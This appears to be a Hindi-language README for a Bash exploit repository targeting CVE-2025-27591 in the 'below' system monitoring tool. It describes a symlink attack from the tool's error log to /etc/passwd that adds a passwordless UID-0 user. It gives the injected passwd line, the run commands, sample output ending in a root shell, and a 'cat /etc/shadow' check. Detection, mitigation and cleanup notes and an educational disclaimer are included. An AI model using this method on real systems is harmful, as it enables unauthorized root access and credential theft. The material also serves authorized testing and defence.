
एक Bash-आधारित विशेषाधिकार वृद्धि शोषण जो `below` सिस्टम प्रदर्शन निगरानी उपकरण को लक्षित करता है। यह पुनर्निर्मित शोषण लॉगिंग तंत्र में एक symlink कमजोरी का लाभ उठाकर `/etc/passwd` में एक रूट उपयोगकर्ता को इंजेक्ट करता है, पूर्ण रूट पहुंच प्राप्त करता है।
एक Bash-आधारित विशेषाधिकार वृद्धि शोषण जो below सिस्टम प्रदर्शन निगरानी उपकरण को लक्षित करता है। यह नवीनीकृत शोषण लॉगिंग तंत्र में एक सिमलिंक कमजोरी का लाभ उठाकर /etc/passwd में एक रूट उपयोगकर्ता इंजेक्ट करता है, जिससे पूर्ण रूट पहुंच प्राप्त होती है।
Matthias Gerstner @ SUSE - सुरक्षा सलाहकार द्वारा खोज और रिपोर्ट किया गया
/usr/bin/below (Facebook का सिस्टम प्रदर्शन निगरानी उपकरण)/var/log/below/error_root.log → /etc/passwdbelow निगरानी उपकरण ऊंचे विशेषाधिकारों के साथ चलने पर त्रुटियों को /var/log/below/error_root.log में लॉग करता है। यदि लॉग निर्देशिका विश्व-लेखनीय है, तो एक हमलावर:
error_root.log से /etc/passwd तक एक सिम्बोलिक लिंक बना सकता हैbelow record कमांड को ट्रिगर कर सकता हैयह शोषण विभिन्न सिस्टम कॉन्फ़िगरेशन को संभालने के लिए बुद्धिमान फ़ॉलबैक तंत्र के साथ पूरी प्रक्रिया को स्वचालित करता है।
flowchart TD
A[Start Exploit] --> B[Get Username from User]
B --> C{Check /var/log/below<br/>World-Writable?}
C -->|No| D[Exit: Not Vulnerable]
C -->|Yes| E[Remove Existing error_root.log]
E --> F[Create Symlink:<br/>error_root.log → /etc/passwd]
F --> G{Symlink Created<br/>Successfully?}
G -->|No| D
G -->|Yes| H[Execute: sudo below record]
H --> I[Wait 3 seconds for logging]
I --> J[Kill below process]
J --> K{Payload in<br/>/etc/passwd?}
K -->|Yes| M[Success Path]
K -->|No| L[Attempt Manual Injection:<br/>echo payload >> symlink]
L --> N{Manual Injection<br/>Success?}
N -->|No| O[Try Fallback:<br/>sudo tee -a]
N -->|Yes| M
O --> P{Fallback<br/>Success?}
P -->|No| D
P -->|Yes| M
M --> Q[Verify Payload in /etc/passwd]
Q --> R[Disable Cleanup Trap]
R --> S[Execute: su username]
S --> T[Root Shell Obtained]
style A fill:#e1f5ff
style T fill:#90EE90
style D fill:#ffcccb
style M fill:#98fb98
पूर्व-जांच चरण
/var/log/below निर्देशिका के अस्तित्व की जांच करेंसेटअप चरण
error_root.log फ़ाइल को हटाएं/var/log/below/error_root.log → /etc/passwdइंजेक्शन चरण (प्राथमिक विधि)
sudo below record निष्पादित करें/etc/passwd को उपयोगी तरीके से दूषित किया हैइंजेक्शन चरण (फ़ॉलबैक विधियाँ)
echo >> symlink)sudo tee -a)शेल उत्पन्न चरण
/etc/passwd में दुर्भावनापूर्ण उपयोगकर्ता के अस्तित्व की पुष्टि करेंइंजेक्ट की गई /etc/passwd प्रविष्टि इस प्रारूप का अनुसरण करती है:
username::0:0:username:/root:/bin/bash
फ़ील्ड विवरण:
username: उपयोगकर्ता द्वारा प्रदान किया गया उपयोगकर्ता नाम (डिफ़ॉल्ट: "0xdtc")::: खाली पासवर्ड फ़ील्ड (कोई पासवर्ड आवश्यक नहीं)0:0: UID=0, GID=0 (रूट विशेषाधिकार)username: GECOS फ़ील्ड (उपयोगकर्ता विवरण)/root: होम निर्देशिका/bin/bash: लॉगिन शेलbelow बाइनरी चल रही हो/var/log/below निर्देशिका विश्व-लेखनीय होनी चाहिएbelow record निष्पादित करने के लिए sudo पहुंच होनी चाहिए# Make script executable
chmod +x CVE-2025-27591
# Run the exploit
./CVE-2025-27591
========================================
CVE-2025-27591 Exploit (Bash)
========================================
[*] This exploit will create a new root user in /etc/passwd
[?] Enter username for the new root user (default: 0xdtc): myuser
[+] Using username: myuser
0xdtc@kali:/tmp$ ./CVE-2025-27591
========================================
CVE-2025-27591 Exploit (Bash)
========================================
[*] This exploit will create a new root user in /etc/passwd
[?] Enter username for the new root user (default: 0xdtc): 0xdtc
[+] Using username: 0xdtc
[*] Checking for CVE-2025-27591 vulnerability
[+] /var/log/below is world-writable
[*] Testing symlink creation
[+] Symlink test successful
[+] Target is vulnerable
[*] Starting exploitation
[+] Wrote payload to /tmp/exploit_payload
[*] Creating symlink: /var/log/below/error_root.log -> /etc/passwd
[+] Symlink created
[*] Executing 'sudo below record' to trigger logging
[*] Started 'below record' with PID: 12345
[*] Checking if payload was written
[*] Attempting manual injection
[*] Appending payload to /etc/passwd via symlink
[+] Payload appended
[+] Exploitation completed! Payload is in /etc/passwd
[*] Spawning root shell via 'su 0xdtc'
[*] Password should be empty, just press Enter
root@kali:/tmp# whoami
root
स्क्रिप्ट में विभिन्न सिस्टम कॉन्फ़िगरेशन को संभालने के लिए कई फ़ॉलबैक तंत्र शामिल हैं:
मौजूदा फ़ाइल हैंडलिंग
एकाधिक इंजेक्शन विधियाँ
below record त्रुटि लॉगिंग के माध्यम से ट्रिगरsudo tee का उपयोग करके विशेषाधिकारित लेखनप्रक्रिया प्रबंधन
below प्रक्रियाओं को समाप्त करता हैपुनः-रन पहचान
/etc/passwd में मौजूद है या नहीं.
├── CVE-2025-27591 # Main exploitation script
├── README.md # This documentation
└── /tmp/exploit_payload # Temporary payload file (created at runtime)
सफल शोषण के बाद, रूट पहुंच सत्यापित करें:
# Check current user
root@target:/tmp# whoami
root
# Check user ID and groups
root@target:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
# Verify user in /etc/passwd
root@target:/tmp# grep "^0xdtc:" /etc/passwd
0xdtc::0:0:0xdtc:/root:/bin/bash
# Read root-only files
root@target:/tmp# cat /etc/shadow
[... shadow file contents ...]
यदि आपको परीक्षण के बाद दुर्भावनापूर्ण उपयोगकर्ता को हटाने की आवश्यकता है:
# Remove the injected user from /etc/passwd
sudo sed -i '/^username:/d' /etc/passwd
# Remove any leftover symlinks
rm -f /var/log/below/error_root.log
username को शोषण के दौरान उपयोग किए गए वास्तविक उपयोगकर्ता नाम से बदलें।
फ़ाइल अखंडता निगरानी
# Monitor /etc/passwd for unauthorized changes
aide --check
सिमलिंक पहचान
# Check for suspicious symlinks in log directories
find /var/log -type l -ls
ऑडिट लॉग
# Check for suspicious sudo usage
grep "below record" /var/log/auth.log
निर्देशिका अनुमतियाँ ठीक करें
# Remove world-writable permission from log directory
sudo chmod 755 /var/log/below
AppArmor/SELinux नीतियाँ
below बाइनरी फ़ाइल लेखन स्थानों को प्रतिबंधित करेंBelow अपडेट करें
/etc/passwd की निगरानी करें
यह शोषण केवल शैक्षिक उद्देश्यों और अधिकृत प्रवेश परीक्षण के लिए है।
कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है। इस उपकरण का उपयोग केवल उन सिस्टमों पर करें जहां आपके पास सुरक्षा परीक्षण करने की स्पष्ट अनुमति हो। लेखक इस उपकरण के दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते।
इस शोषण का उपयोग करके, आप स्वीकार करते हैं कि आप:
Repository: https://github.com/0xDTC/ लेखक: Divine Clown (0xDTC) लाइसेंस: केवल शैक्षिक उपयोग अंतिम अद्यतन: 2025-11-13
su <username> निष्पादित करें